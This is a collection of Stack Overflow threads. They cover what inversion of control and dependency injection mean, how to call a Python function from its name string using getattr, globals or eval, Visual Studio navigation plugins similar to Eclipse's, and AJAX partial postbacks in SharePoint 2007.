b. Critical when developing modular systems. A modular system is a system whose components can be replaced without requiring recompilation.
c. Critical if there are many cross-cutting concerns which need to be addressed, particularly in an enterprise application.
A: Let's say that we have a meeting in a hotel.
We have invited many people, so we have left out many jugs of water and many plastic cups.
When somebody wants to drink, he/she fills a cup, drinks the water and throws the cup on the floor.
After an hour or so we have a floor covered with plastic cups and water.
Let's try that after inverting the control:
Imagine the same meeting in the same place, but instead of plastic cups we now have a waiter with just one glass cup (Singleton)
When somebody wants to drink, the waiter gets one for them. They drink it and return it to the waiter.
Leaving aside the question of the hygiene, the use of a waiter (process control) is much more effective and economic.
And this is exactly what Spring (or another IoC container, for example Guice) does. Instead of letting the application create what it needs using the new keyword (i.e. taking a plastic cup), Spring IoC offers the application the same cup/instance (singleton) of the needed object (the glass of water).
Think of yourself as an organizer of such a meeting:
Example:-
public class MeetingMember {
private GlassOfWater glassOfWater;
...
public void setGlassOfWater(GlassOfWater glassOfWater){
this.glassOfWater = glassOfWater;
}
//your glassOfWater object is initialized and ready to use...
//Spring IoC called the setGlassOfWater method itself in order to
//offer the meetingMember a glassOfWater instance
}
Useful links:-
*
*http://adfjsf.blogspot.in/2008/05/inversion-of-control.html
*http://martinfowler.com/articles/injection.html
*http://www.shawn-barrett.com/blog/post/Tip-of-the-day-e28093-Inversion-Of-Control.aspx
A: I shall write down my simple understanding of these two terms:
For quick understanding just read examples*
Dependency Injection(DI):
Dependency injection generally means passing an object on which a method depends as a parameter to that method, rather than having the method create the dependent object. In practice this means the method does not depend directly on a particular implementation; any implementation that meets the requirements can be passed as a parameter.
With this, objects declare their dependencies.
And Spring makes them available. This leads to loosely coupled application development.
Quick example: when an Employee object is created, it will automatically create an Address object (if Address is defined as a dependency of Employee).
Inversion of Control (IoC) Container:
This is a common characteristic of frameworks. IoC manages Java objects, from instantiation to destruction, through its BeanFactory. Java components that are instantiated by the IoC container are called beans, and the IoC container manages a bean's scope, lifecycle events, and any AOP features for which it has been configured and coded.
Quick example: Inversion of Control is about getting freedom, more flexibility, and less dependency. When you are using a desktop computer, you are enslaved (or, say, controlled). You have to sit before a screen and look at it, use the keyboard to type and the mouse to navigate. Badly written software can enslave you even more. If you replaced your desktop with a laptop, you would somewhat invert control: you can easily take it and move around. So now you can control where you are with your computer, instead of the computer controlling it.
By implementing Inversion of Control, a software/object consumer gets more control/options over the software/objects, instead of being controlled or having fewer options.
Inversion of control as a design guideline serves the following purposes:
There is a decoupling of the execution of a certain task from implementation.
Every module can focus on what it is designed for.
Modules make no assumptions about what other systems do but rely on their contracts.
Replacing modules has no side effect on other modules. I will keep things abstract here; you can visit the following links for a detailed understanding of the topic.
A good read with example
Detailed explanation
A: Inversion of Control is about separating concerns.
Without IoC: You have a laptop computer and you accidentally break the screen. And darn, you find the same model laptop screen is nowhere in the market. So you're stuck.
With IoC: You have a desktop computer and you accidentally break the screen. You find you can just grab almost any desktop monitor from the market, and it works well with your desktop.
Your desktop successfully implements IoC in this case. It accepts a variety of monitors, while the laptop does not; it needs a specific screen to get fixed.
A: I found a very clear example here which explains how the 'control is inverted'.
Classic code (without Dependency injection)
Here is roughly how code not using DI will work:
*
*Application needs Foo (e.g. a controller), so:
*Application creates Foo
*Application calls Foo
*
*Foo needs Bar (e.g. a service), so:
*Foo creates Bar
*Foo calls Bar
*
*Bar needs Bim (a service, a repository, …), so:
*Bar creates Bim
*Bar does something
Using dependency injection
Here is roughly how code using DI will work:
*
*Application needs Foo, which needs Bar, which needs Bim, so:
*Application creates Bim
*Application creates Bar and gives it Bim
*Application creates Foo and gives it Bar
*Application calls Foo
*
*Foo calls Bar
*
*Bar does something
The control of the dependencies is inverted from one being called to the one calling.
What problems does it solve?
Dependency injection makes it easy to swap in different implementations of the injected classes. While unit testing you can inject a dummy implementation, which makes testing a lot easier.
Ex: Suppose your application stores the user uploaded file in the Google Drive, with DI your controller code may look like this:
class SomeController
{
private $storage;
function __construct(StorageServiceInterface $storage)
{
$this->storage = $storage;
}
public function myFunction($fileName)
{
return $this->storage->getFile($fileName);
}
}
class GoogleDriveService implements StorageServiceInterface
{
public function authenticate($user) {}
public function putFile($file) {}
public function getFile($file) {}
}
When your requirements change, say you are asked to use Dropbox instead of Google Drive, you only need to write a Dropbox implementation of the StorageServiceInterface. You don't have to make any changes in the controller as long as the Dropbox implementation adheres to the StorageServiceInterface.
While testing you can create the mock for the StorageServiceInterface with the dummy implementation where all the methods return null(or any predefined value as per your testing requirement).
Instead, if you had the controller class construct the storage object with the new keyword like this:
class SomeController
{
private $storage;
function __construct()
{
$this->storage = new GoogleDriveService();
}
public function myFunction($fileName)
{
return $this->storage->getFile($fileName);
}
}
When you want to switch to the Dropbox implementation you have to replace all the lines where a new GoogleDriveService object is constructed and use DropboxService instead. Besides, when testing the SomeController class the constructor always expects the GoogleDriveService class, and the actual methods of this class are triggered.
When is it appropriate and when not?
In my opinion you use DI when you think there are (or there can be) alternative implementations of a class.
A: Inversion of control means you control how components (classes) behave. Why is it called "inversion"? Because before this pattern, classes were hard-wired and definitive about what they would do. For example:
you import a library that has TextEditor and SpellChecker classes. Now naturally this SpellChecker only checks spellings for the English language. Suppose you want the TextEditor to handle the German language and be able to spell-check it; you don't have any control over that.
With IoC this control is inverted, i.e. it's given to you. How? The library would implement something like this:
It will have a TextEditor class and then it will have an ISpellChecker (which is an interface instead of a concrete SpellChecker class), and when you configure things in an IoC container, e.g. Spring, you can provide your own implementation of ISpellChecker which will check spelling for the German language. So the control of how spell checking works is inverted: taken from that library and given to you. That's IoC.
A: The Inversion-of-Control (IoC) pattern, is about providing any kind of callback, which "implements" and/or controls reaction, instead of acting ourselves directly (in other words, inversion and/or redirecting control to the external handler/controller).
The Dependency-Injection (DI) pattern is a more specific version of IoC pattern, and is all about removing dependencies from your code.
Every DI implementation can be considered IoC, but one should not call it IoC, because implementing Dependency-Injection is harder than a simple callback (don't lower your product's worth by using the general term "IoC" instead).
For DI example, say your application has a text-editor component, and you want to provide spell checking. Your standard code would look something like this:
public class TextEditor {
private SpellChecker checker;
public TextEditor() {
this.checker = new SpellChecker();
}
}
What we've done here creates a dependency between the TextEditor and the SpellChecker.
In an IoC scenario we would instead do something like this:
public class TextEditor {
private IocSpellChecker checker;
public TextEditor(IocSpellChecker checker) {
this.checker = checker;
}
}
In the first code example we are instantiating SpellChecker (this.checker = new SpellChecker();), which means the TextEditor class directly depends on the SpellChecker class.
In the second code example we are creating an abstraction by having the SpellChecker dependency class in TextEditor's constructor signature (not initializing the dependency in the class). This allows us to create the dependency and then pass it to the TextEditor class like so:
SpellChecker sc = new SpellChecker(); // dependency
TextEditor textEditor = new TextEditor(sc);
Now the client creating the TextEditor class has control over which SpellChecker implementation to use because we're injecting the dependency into the TextEditor signature.
Note that just as IoC is the base of many other patterns, the above sample is only one of many kinds of Dependency-Injection (a compact sketch of each kind follows this list), for example:
*
*Constructor Injection.
Where an instance of IocSpellChecker would be passed to the constructor, either automatically or manually as above.
*Setter Injection.
Where an instance of IocSpellChecker would be passed through a setter method or public property.
*Service-lookup and/or Service-locator
Where TextEditor would ask a known provider for a globally-used instance (service) of the IocSpellChecker type (maybe without storing said instance, instead asking the provider again and again).
A: I agree with NilObject, but I'd like to add to this:
if you find yourself copying an entire method and only changing a small piece of the code, you can consider tackling it with inversion of control
If you find yourself copying and pasting code around, you're almost always doing something wrong. Codified as the design principle Once and Only Once.
A: For example, suppose task #1 is to create an object.
Without the IoC concept, task #1 is done by the programmer. With the IoC concept, task #1 is done by the container.
In short, control is inverted from the programmer to the container; that is why it is called inversion of control.
I found one good example here.
A: It seems that the most confusing thing about "IoC" the acronym and the name for which it stands is that it's too glamorous of a name - almost a noise name.
Do we really need a name by which to describe the difference between procedural and event driven programming? OK, if we need to, but do we need to pick a brand new "bigger than life" name that confuses more than it solves?
A: Inversion of control is when you go to the grocery store and your wife gives you the list of products to buy.
In programming terms, she passed a callback function getProductList() to the function you are executing - doShopping().
It allows the user of the function to define some parts of it, making it more flexible.
A: Inversion of Control (or IoC) is about getting freedom (you get married, you lose freedom and you are being controlled; you divorce, and you have just implemented Inversion of Control. That's what we call "decoupled". A good computer system discourages some very close relationships.), more flexibility (the kitchen in your office only serves clean tap water, so that is your only choice when you want to drink. Your boss implemented Inversion of Control by setting up a new coffee machine. Now you get the flexibility of choosing either tap water or coffee.), and less dependency (your partner has a job, you don't have a job, you financially depend on your partner, so you are controlled. You find a job, and you have implemented Inversion of Control. A good computer system encourages independence.)
When you use a desktop computer, you are enslaved (or, say, controlled). You have to sit before a screen and look at it, use the keyboard to type and the mouse to navigate. Badly written software can enslave you even more. If you replace your desktop with a laptop, then you have somewhat inverted control: you can easily take it and move around. So now you can control where you are with your computer, instead of your computer controlling it.
By implementing Inversion of Control, a software/object consumer gets more controls/options over the software/objects, instead of being controlled or having fewer options.
With the above ideas in mind. We still miss a key part of IoC. In the scenario of IoC, the software/object consumer is a sophisticated framework. That means the code you created is not called by yourself. Now let's explain why this way works better for a web application.
Suppose your code is a group of workers. They need to build a car. These workers need a place and tools (a software framework) to build the car. A traditional software framework will be like a garage with many tools. So the workers need to make a plan themselves and use the tools to build the car. Building a car is not an easy business, it will be really hard for the workers to plan and cooperate properly. A modern software framework will be like a modern car factory with all the facilities and managers in place. The workers do not have to make any plan, the managers (part of the framework, they are the smartest people and made the most sophisticated plan) will help coordinate so that the workers know when to do their job (framework calls your code). The workers just need to be flexible enough to use any tools the managers give to them (by using Dependency Injection).
Although the workers give control of managing the project at the top level to the managers (the framework), it is good to have some professionals help out. This is where the concept of IoC truly comes from.
Modern web applications with an MVC architecture depend on the framework to do URL routing and put controllers in place for the framework to call.
Dependency Injection and Inversion of Control are related. Dependency Injection is at the micro level and Inversion of Control is at the macro level. You have to eat every bite (implement DI) in order to finish a meal (implement IoC).
A: Inversion of Control is a generic principle, while Dependency Injection realises this principle as a design pattern for object graph construction (i.e. configuration controls how the objects are referencing each other, rather than the object itself controlling how to get the reference to another object).
Looking at Inversion of Control as a design pattern, we need to look at what we are inverting. Dependency Injection inverts control of constructing a graph of objects. In layman's terms, inversion of control implies a change in the flow of control in the program. E.g., in a traditional standalone app, we have the main method, from where control gets passed to third-party libraries (in case we have used a third-party library's function); but through inversion of control, control gets transferred from the third-party library code to our code, as we are taking the service of the third-party library. However, there are other aspects that need to be inverted within a program as well, e.g. invocation of methods and threads to execute the code.
For those interested in more depth on Inversion of Control a paper has been published outlining a more complete picture of Inversion of Control as a design pattern (OfficeFloor: using office patterns to improve software design http://doi.acm.org/10.1145/2739011.2739013 with a free copy available to download from http://www.officefloor.net/about.html).
What is identified is the following relationship:
Inversion of Control (for methods) = Dependency (state) Injection + Continuation Injection + Thread Injection
Summary of above relationship for Inversion of Control available - http://dzone.com/articles/inversion-of-coupling-control
A: I understand that the answer has already been given here. But I still think some basics about inversion of control have to be discussed here at length for future readers.
Inversion of Control (IoC) is built on a very simple principle called the Hollywood Principle, which says:
Don't call us, we'll call you
What it means is: don't go to Hollywood to fulfill your dream; rather, if you are worthy, Hollywood will find you and make your dream come true. Pretty much inverted, huh?
Now when we discuss the principle of IoC, we tend to forget about Hollywood. For IoC, there have to be three elements: a Hollywood, you, and a task, such as fulfilling your dream.
In our programming world, Hollywood represents a generic framework (maybe written by you or someone else), you represent the user code you wrote, and the task represents the thing you want to accomplish with your code. Now you don't ever trigger your task by yourself; not in IoC! Rather you design everything in such a way that your framework triggers your task for you. Thus you have built a reusable framework which can make someone a hero or another one a villain. But that framework is always in charge; it knows when to pick someone, and that someone only knows what it wants to be.
Here is a real-life example. Suppose you want to develop a web application. So you create a framework which will handle all the common things a web application should handle, like handling HTTP requests, creating the application menu, serving pages, managing cookies, triggering events, etc.
Then you leave some hooks in your framework where you can put further code to generate custom menus, pages, or cookies, or to log some user events. On every browser request, your framework runs and executes your custom code if hooked, then serves the result back to the browser.
So the idea is pretty simple. Rather than creating a user application which controls everything, you first create a reusable framework which controls everything, then write your custom code and hook it into the framework to be executed in time.
Laravel and EJB are examples of such frameworks.
Reference:
https://martinfowler.com/bliki/InversionOfControl.html
https://en.wikipedia.org/wiki/Inversion_of_control
A: A very simple written explanation can be found here
http://binstock.blogspot.in/2008/01/excellent-explanation-of-dependency.html
It says -
"Any nontrivial application is made up of two or more classes that
collaborate with each other to perform some business logic.
Traditionally, each object is responsible for obtaining its own
references to the objects it collaborates with (its dependencies).
When applying DI, the objects are given their dependencies at creation
time by some external entity that coordinates each object in the
system. In other words, dependencies are injected into objects."
A: IoC is about inverting the relationship between your code and third-party code (library/framework):
*
*In normal s/w development, you write the main() method and call "library" methods. You are in control :)
*In IoC the "framework" controls main() and calls your methods. The Framework is in control :(
DI (Dependency Injection) describes how the control flows in the application. A traditional desktop application had control flow from your application (the main() method) to other library method calls, but with DI the control flow is inverted: the framework takes care of starting your app, initializing it, and invoking your methods whenever required.
In the end you always win :)
A: I like this explanation: http://joelabrahamsson.com/inversion-of-control-an-introduction-with-examples-in-net/
It starts simple and shows code examples as well.
The consumer, X, needs the consumed class, Y, to accomplish something. That’s all good and natural, but does X really need to know that it uses Y?
Isn’t it enough that X knows that it uses something that has the behavior, the methods, properties etc, of Y without knowing who actually implements the behavior?
By extracting an abstract definition of the behavior used by X in Y, illustrated as I below, and letting the consumer X use an instance of that instead of Y, X can continue to do what it does without having to know the specifics about Y.
In the illustration above Y implements I and X uses an instance of I. While it’s quite possible that X still uses Y what’s interesting is that X doesn’t know that. It just knows that it uses something that implements I.
Read article for further info and description of benefits such as:
*
*X is not dependent on Y anymore
*More flexible, implementation can be decided in runtime
*Isolation of code unit, easier testing
...
A: Programmatically speaking
IoC in easy terms: it's the use of an interface as a way of specifying something (such as a field or a parameter) as a wildcard that can be used by many classes. It allows reusability of the code.
For example, let's say that we have two classes: Dog and Cat. Both share the same qualities/states: age, size, weight. So instead of creating two service classes called DogService and CatService, I can create a single one called AnimalService that accepts Dog and Cat as long as they implement the interface IAnimal.
However, pragmatically speaking, it has some drawbacks.
a) Most developers don't know how to use it well. For example, I can create a class called Customer and automatically create (using the IDE's tools) an interface called ICustomer. So it's not rare to find a folder filled with classes and interfaces, regardless of whether the interfaces will ever be reused. It's called BLOAT. Some people could argue that "maybe in the future we could use it". :-|
b) It has some limitations. For example, let's take the case of Dog and Cat again, and say I want to add a new service (functionality) only for dogs. Let's say that I want to calculate the number of days needed to train a dog (trainDays()); for a cat it's useless, cats can't be trained (I'm joking).
b.1) If I add trainDays() to the AnimalService then it also applies to cats, which is not valid at all.
b.2) I can add a condition in trainDays() that evaluates which class is used. But that completely breaks the IoC.
b.3) I can create a new service class called DogService just for the new functionality. But it increases the maintenance burden, because we now have two service classes (with similar functionality) for Dog, and that's bad.
A: Inversion of control is about transferring control from library to the client. It makes more sense when we talk about a client that injects (passes) a function value (lambda expression) into a higher order function (library function) that controls (changes) the behavior of the library function.
So, a simple implementation (with huge implications) of this pattern is a higher order library function (which accepts another function as an argument). The library function transfers control over its behavior by giving the client the ability to supply the "control" function as an argument.
For example, library functions like "map", "flatMap" are IoC implementations.
Of course, a limited IoC version is, for example, a boolean function parameter. A client may control the library function by switching the boolean argument.
A client or framework that injects library dependencies (which carry behavior) into libraries may also be considered IoC
A: Before using Inversion of Control you should be well aware of the fact that it has its pros and cons and you should know why you use it if you do so.
Pros:
*
*Your code gets decoupled so you can easily exchange implementations of an interface with alternative implementations
*It is a strong motivator for coding against interfaces instead of implementations
*It's very easy to write unit tests for your code because it depends on nothing other than the objects it accepts in its constructor/setters, and you can easily initialize them with the right objects in isolation.
Cons:
*
*IoC not only inverts the control flow in your program, it also clouds it considerably. This means you can no longer just read your code and jump from one place to another because the connections that would normally be in your code are not in the code anymore. Instead it is in XML configuration files or annotations and in the code of your IoC container that interprets these metadata.
*There arises a new class of bugs where you get your XML config or your annotations wrong and you can spend a lot of time finding out why your IoC container injects a null reference into one of your objects under certain conditions.
Personally I see the strong points of IoC and I really like them but I tend to avoid IoC whenever possible because it turns your software into a collection of classes that no longer constitute a "real" program but just something that needs to be put together by XML configuration or annotation metadata and would fall (and falls) apart without it.
A: What is it? Inversion of (Coupling) Control changes the direction of coupling for a method signature. With inverted control, the definition of the method signature is dictated by the method implementation (rather than by the caller of the method). Full explanation here
Which problem does it solve? Top-down coupling on methods. This subsequently removes the need for refactoring.
When is it appropriate to use and when not? For small, well-defined applications that are not subject to much change, it is likely an overhead. However, for less-defined applications that will evolve, it reduces the inherent coupling of the method signature. This gives developers more freedom to evolve the application, avoiding the need to do expensive refactoring of code. Basically, it allows the application to evolve with little rework.
A: To understand IoC, we should talk about Dependency Inversion.
Dependency inversion: Depend on abstractions, not on concretions.
Inversion of control: Main vs Abstraction, and how the Main is the glue of the systems.
I wrote about this with some good examples, you can check them here:
https://coderstower.com/2019/03/26/dependency-inversion-why-you-shouldnt-avoid-it/
https://coderstower.com/2019/04/02/main-and-abstraction-the-decoupled-peers/
https://coderstower.com/2019/04/09/inversion-of-control-putting-all-together/
A: Inversion of control is an indicator of a shift of responsibility in the program.
There is an inversion of control every time a dependency is granted the ability to act directly in the caller's space.
The smallest IoC is passing a variable by reference. Let's look at non-IoC code first:
function isVarHello($var) {
return ($var === "Hello");
}
// Responsibility is within the caller
$word = "Hello";
if (isVarHello($word)) {
$word = "World";
}
Let's now invert the control by shifting the responsibility of a result from the caller to the dependency:
function changeHelloToWorld(&$var) {
// Responsibility has been shifted to the dependency
if ($var === "Hello") {
$var = "World";
}
}
$word = "Hello";
changeHelloToWorld($word);
Here is another example using OOP:
<?php
class Human {
private $hp = 0.5;
function consume(Eatable $chunk) {
// $this->chew($chunk);
$chunk->unfoldEffectOn($this);
}
function incrementHealth() {
$this->hp++;
}
function isHealthy() {}
function getHungry() {}
// ...
}
interface Eatable {
public function unfoldEffectOn($body);
}
class Medicine implements Eatable {
function unfoldEffectOn($human) {
// The dependency is now in charge of the human.
$human->incrementHealth();
$this->depleted = true;
}
}
$human = new Human();
$medicine = new Medicine();
if (!$human->isHealthy()) {
$human->consume($medicine);
}
var_dump($medicine);
var_dump($human);
*) Disclaimer: The real world human uses a message queue.
A: I think of Inversion of Control in the context of using a library or a framework.
The traditional way of "control" is that we build a controller class (usually main, but it could be anything), import a library and then use your controller class to "control" the action of the software components. Like your first C/Python program (after Hello World).
import pandas as pd
df = pd.DataFrame()
# Now do things with the dataframe.
In this case, we need to know what a DataFrame is in order to work with it. You need to know what methods to use, what values it takes, and so on. If you add it to your own class through polymorphism or just by instantiating it anew, your class will need the DataFrame library to work properly.
"Inversion of Control" means that the process is reversed. Instead of your classes controlling elements of a library, framework or engine, you register classes and send them back to the engine to be controlled. Worded another way, IoC can mean we are using our code to configure a framework. You could also think of it as similar to the way we use functions in map or filter to deal with data in a list, except applied to an entire application.
If you are the one who built the engine, then you are probably using Dependency Injection approaches (described above) to make that happen. If you are the one using the engine (more common), then you should be able to just declare classes, add appropriate annotations, and let the framework do the rest of the work (e.g. creating routes, assigning servlets, setting events, outputting widgets, etc.) for you.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3058",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2264"
} |
Q: Calling a function of a module by using its name (a string) How do I call a function, using a string with the function's name? For example:
import foo
func_name = "bar"
call(foo, func_name) # calls foo.bar()
A: Nobody mentioned operator.attrgetter yet:
>>> from operator import attrgetter
>>> l = [1, 2, 3]
>>> attrgetter('reverse')(l)()
>>> l
[3, 2, 1]
>>>
A: The best answer according to the Python programming FAQ would be:
functions = {'myfoo': foo.bar}
mystring = 'myfoo'
if mystring in functions:
functions[mystring]()
The primary advantage of this technique is that the strings do not need to match the names of the functions. This is also the primary technique used to emulate a case construct
A: getattr calls a method by name from an object.
But this object should be a parent of the calling class.
The parent class can be got by super(self.__class__, self)
class Base:
def call_base(func):
"""This does not work"""
def new_func(self, *args, **kwargs):
name = func.__name__
getattr(super(self.__class__, self), name)(*args, **kwargs)
return new_func
def f(self, *args):
print(f"BASE method invoked.")
def g(self, *args):
print(f"BASE method invoked.")
class Inherit(Base):
@Base.call_base
def f(self, *args):
"""function body will be ignored by the decorator."""
pass
@Base.call_base
def g(self, *args):
"""function body will be ignored by the decorator."""
pass
Inherit().f() # The goal is to print "BASE method invoked."
A: *
*Using locals(), which returns a dictionary with the current local symbol table:
locals()["myfunction"]()
*Using globals(), which returns a dictionary with the global symbol table:
globals()["myfunction"]()
A: The answer (I hope) no one ever wanted
Eval like behavior
getattr(locals().get("foo") or globals().get("foo"), "bar")()
Why not add auto-importing
getattr(
locals().get("foo") or
globals().get("foo") or
__import__("foo"),
"bar")()
In case we have extra dictionaries we want to check
getattr(next((x for x in (f("foo") for f in
[locals().get, globals().get,
self.__dict__.get, __import__])
if x)),
"bar")()
We need to go deeper
getattr(next((x for x in (f("foo") for f in
([locals().get, globals().get, self.__dict__.get] +
[d.get for d in (list(dd.values()) for dd in
[locals(),globals(),self.__dict__]
if isinstance(dd,dict))
if isinstance(d,dict)] +
[__import__]))
if x)),
"bar")()
A: Based on Patrick's solution, to get the module dynamically as well, import it using:
module = __import__('foo')
func = getattr(module, 'bar')
func()
A: For what it's worth, if you needed to pass the function (or class) name and app name as a string, then you could do this:
myFnName = "MyFn"
myAppName = "MyApp"
app = sys.modules[myAppName]
fn = getattr(app,myFnName)
A: Try this. While this still uses eval, it only uses it to summon the function from the current context. Then, you have the real function to use as you wish.
The main benefit for me from this is that you will get any eval-related errors at the point of summoning the function. Then you will get only the function-related errors when you call.
def say_hello(name):
print 'Hello {}!'.format(name)
# get the function by name
method_name = 'say_hello'
method = eval(method_name)
# call it like a regular function later
args = ['friend']
kwargs = {}
method(*args, **kwargs)
A: I faced a similar problem before, which was to convert a string to a function. But I couldn't use eval() or ast.literal_eval(), because I didn't want to execute the code immediately.
E.g. I have a string "foo.bar", and I want to assign it to x as a function name instead of a string, which means I can call the function via x() ON DEMAND.
here's my code:
str_to_convert = "foo.bar"
exec(f"x = {str_to_convert}")
x()
as for your question, you only need to add your module name foo and . before {} as follows:
str_to_convert = "bar"
exec(f"x = foo.{str_to_convert}")
x()
WARNING!!! either eval() or exec() is a dangerous method, you should confirm the safety.
WARNING!!! either eval() or exec() is a dangerous method, you should confirm the safety.
WARNING!!! either eval() or exec() is a dangerous method, you should confirm the safety.
A: Given a module foo with method bar:
import foo
bar = getattr(foo, 'bar')
result = bar()
getattr can similarly be used on class instance bound methods, module-level methods, class methods... the list goes on.
A: As the question How to dynamically call methods within a class using method-name assignment to a variable [duplicate] was marked as a duplicate of this one, I am posting a related answer here:
The scenario is: a method in a class wants to call another method on the same class dynamically. I have added some details to the original example, which offers a wider scenario and clarity:
class MyClass:
def __init__(self, i):
self.i = i
def get(self):
func = getattr(MyClass, 'function{}'.format(self.i))
func(self, 12) # This one will work
# self.func(12) # But this does NOT work.
def function1(self, p1):
print('function1: {}'.format(p1))
# do other stuff
def function2(self, p1):
print('function2: {}'.format(p1))
# do other stuff
if __name__ == "__main__":
class1 = MyClass(1)
class1.get()
class2 = MyClass(2)
class2.get()
Output (Python 3.7.x)
function1: 12
function2: 12
A: None of what was suggested helped me. I did discover this, though:
<object>.__getattribute__(<string name>)(<params>)
I am using Python 2.6.6
Hope this helps
A: Although getattr() is an elegant (and about 7x faster) method, you can get the return value from a function (local, class method, module) with eval just as elegantly, as in x = eval('foo.bar')(). And when you implement some error handling, it is reasonably safe (the same principle can be used for getattr). Example with module import and a class:
# import module, call module function, pass parameters and print retured value with eval():
import random
bar = 'random.randint'
randint = eval(bar)(0,100)
print(randint) # will print random int from <0;100)
# also class method returning (or not) value(s) can be used with eval:
class Say:
def say(something='nothing'):
return something
bar = 'Say.say'
print(eval(bar)('nice to meet you too')) # will print 'nice to meet you too'
When module or class does not exist (typo or anything better) then NameError is raised. When function does not exist, then AttributeError is raised. This can be used to handle errors:
# try/except block can be used to catch both errors
try:
eval('Say.talk')() # raises AttributeError because function does not exist
eval('Says.say')() # raises NameError because the class does not exist
# or the same with getattr:
getattr(Say, 'talk')() # raises AttributeError
getattr(Says, 'say')() # raises NameError
except AttributeError:
# do domething or just...
print('Function does not exist')
except NameError:
# do domething or just...
print('Module does not exist')
A: In python3, you can use the __getattribute__ method. See following example with a list method name string:
func_name = 'reverse'
l = [1, 2, 3, 4]
print(l)
>> [1, 2, 3, 4]
l.__getattribute__(func_name)()
print(l)
>> [4, 3, 2, 1]
A: Just a simple contribution. If the class that we need to instantiate is in the same file, we can use something like this:
# Get class from globals and create an instance
m = globals()['our_class']()
# Get the function (from the instance) that we need to call
func = getattr(m, 'function_name')
# Call it
func()
For example:
class A:
def __init__(self):
pass
def sampleFunc(self, arg):
print('you called sampleFunc({})'.format(arg))
m = globals()['A']()
func = getattr(m, 'sampleFunc')
func('sample arg')
# Sample, all on one line
getattr(globals()['A'](), 'sampleFunc')('sample arg')
And, if not a class:
def sampleFunc(arg):
print('you called sampleFunc({})'.format(arg))
globals()['sampleFunc']('sample arg')
A: Given a string, with a complete python path to a function, this is how I went about getting the result of said function:
import importlib
function_string = 'mypackage.mymodule.myfunc'
mod_name, func_name = function_string.rsplit('.',1)
mod = importlib.import_module(mod_name)
func = getattr(mod, func_name)
result = func()
A: You mean getting a pointer to an inner function from a module:
import foo
method = foo.bar
executed = method(parameter)
This is not the most Pythonic way, but it is indeed possible for specific cases.
A: This is a simple answer that will allow you to clear the screen, for example. There are two examples below, with eval and exec (both require import os first). In an interactive session the eval version will show 0 at the top after clearing (the return value of os.system), while the exec version just executes it. (If you're using Windows, change clear to cls; Linux and Mac users leave it as is.)
eval("os.system(\"clear\")")
exec("os.system(\"clear\")")
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3061",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2330"
} |
Q: Plugin for Visual Studio to Mimic Eclipse's "Open Type" or "Open Resource" Keyboard Access If you've ever used Eclipse, you've probably noticed the great keyboard shortcuts that let you hit a shortcut key combination, then just type the first few characters of a function, class, filename, etc. It's even smart enough to put open files first in the list.
I'm looking for a similar functionality for Visual Studio 2008. I know there's a findfiles plugin on codeproject, but that one is buggy and a little weird, and doesn't give me access to functions or classes.
A: This isn't exactly the same as Eclipse from your description, but Visual Studio has some similar features out of the box (I've never used Visual Assist X, but it does sound interesting).
The Find ComboBox in the toolbar ends up being a sort of "Visual Studio command line". You can press Ctrl+/ (by default) to set focus there, and Visual Studio will insert an ">" at the beginning of the text (indicating that you want to enter a command instead of search). It even auto-completes as you type, helping you to find commands.
Anyway, to open a file from there, type "open <filename>". It will display any matching files in the drop down as you type (it pulls the list of files from the currently open solution).
To quickly navigate to a function, in the code editor press Ctrl+I to start an incremental search. Then just start typing until you find what you are looking for. Press Escape to cancel the search, or F3 to search again using the same query. As you are typing in the search query, the status bar in the lower left corner will contain what Visual Studio is searching for. Granted, this won't search across multiple files (I've never used Eclipse much, but that sounds like what it does from your description), but hopefully it will help you at least a little bit.
A: If anyone stumbles upon this thread:
There's a free plugin (created by me) for Visual Studio 2008 that mimics the Eclipse Ctrl+Shift+R Open Resource dialog (note, not the Open Type dialog). It works with any language and/or project type.
You can find it at Visual Studio Gallery.
A: VS11 (maybe 2010 had it too) has the Navigate To... functionality, which (on my machine) has the Ctrl+, shortcut.
By the way, it understands capitals as camel-case shortcuts (Eclipse does this too). For instance, type HH to get HtmlHelper.
A: Some of the neat features are available in Visual Assist X, though not all of them. I've asked on their forums, but they haven't appeared as yet. VAX gets updated regularly on a roughly four-week cycle for bug fixes, with a new feature every couple of months.
A: ReSharper does this with the Ctrl-N shortcut. Unfortunately it doesn't come for free.
Visual Studio doesn't have anything like this feature beyond Find.
A: If you are looking for an add-in like this to quickly navigate to source files in your project:
try the Visual Studio 2005/2008 add-in SonicFileFinder.
A: Found this thread while searching for Eclipse's Ctrl+Shift+R, and after seeing the Visual Studio Gallery, found the DPack Tools (they are free, and no, I'm not endorsed in any way by them).
But it's exactly what I was searching:
- Alt+U -> File Browser (a la Eclipse Ctrl+Shift+R)
- Alt+M -> Code Browser (Method list in the actual class)
It has more features, but I'm happy with these ones.
A: I have been using biterScripting along with Visual Studio to do more flexible searching and manipulation.
*
*It can search the entire workspace.
*It can search within any project - EVEN IF THAT PROJECT IS NOT LOADED OR EVEN PART OF A WORKSPACE.
*It can find things using regular expressions.
*AND, ABOVE ALL, it can make bulk changes. For example, want to change the name of a class from CCustomer to CUser, I can do it in just a few command lines - Actually, I have written scripts for things like this I do often. I DON'T HAVE TO CLICK ON EACH INSTANCE AND MANUALLY DO THE CHANGE.
*And, it is inexpensive ($0). I downloaded it from http://www.biterscripting.com .
A: I'm also coming from the Java development side and was looking for the Ctrl+T feature in Visual Studio. The other answers refer to opening files, but since in C# the class name and file name can be different, this is not what I was looking for.
With the Class View or the Object Browser you can search for Objects and Classes
[View]->[Class View] or [View]->[Object Browser]
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3067",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Can ASP.NET AJAX partial rendering work inside a SharePoint 2007 application page? I have a simple page with my ScriptManager and my UpdatePanel, and my ContentTemplate has one ListBox and one Label. I am just trying to catch its OnSelectionChanged so I can update the text in the Label. No matter what settings I try to tweak, I always get a full-page postback.
Is this really not going to work, or am I just screwing this up?
A: You need to have Sharepoint 2007 service pack 1 -- or else there's no chance.
(Sharepoint 2007 predates ajax 1.0 -- they built some support into service pack 1)
Next, from a trouble shooting point of view, test that the exact same code functions as expected when hosted in a regular asp.net page. (Literally copy and paste your code across into a fresh page, to rule out any typographical errors). Ruling sharepoint in or out of the problem area will help narrow down the solution space.
A: If you have installed SharePoint 2007 (without Service Pack 1) then you can follow an example like the following article:
